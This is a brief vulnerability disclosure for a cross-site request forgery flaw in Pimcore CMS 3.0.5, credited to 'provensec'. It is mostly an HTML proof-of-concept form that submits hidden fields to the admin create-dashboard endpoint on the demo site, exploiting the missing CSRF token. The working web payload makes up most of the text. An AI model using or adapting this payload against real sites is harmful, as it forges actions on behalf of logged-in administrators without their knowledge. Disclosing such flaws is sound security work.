# Affected software: pimcore cms
# Type of vulnerability:csrf
# URL:pimcore.org
# Discovered by: provensec
# Website: provensec.com

#version: Version: 3.0.5 (Build: 3468)
# Proof of concept

no csrf token on add dashboard form 


<html>
  
  <body>
    <form
action="http://demo.pimcore.org/admin/portal/create-dashboard">
      <input type="hidden" name="&#95;dc" value="1428652489594" />
      <input type="hidden" name="key" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>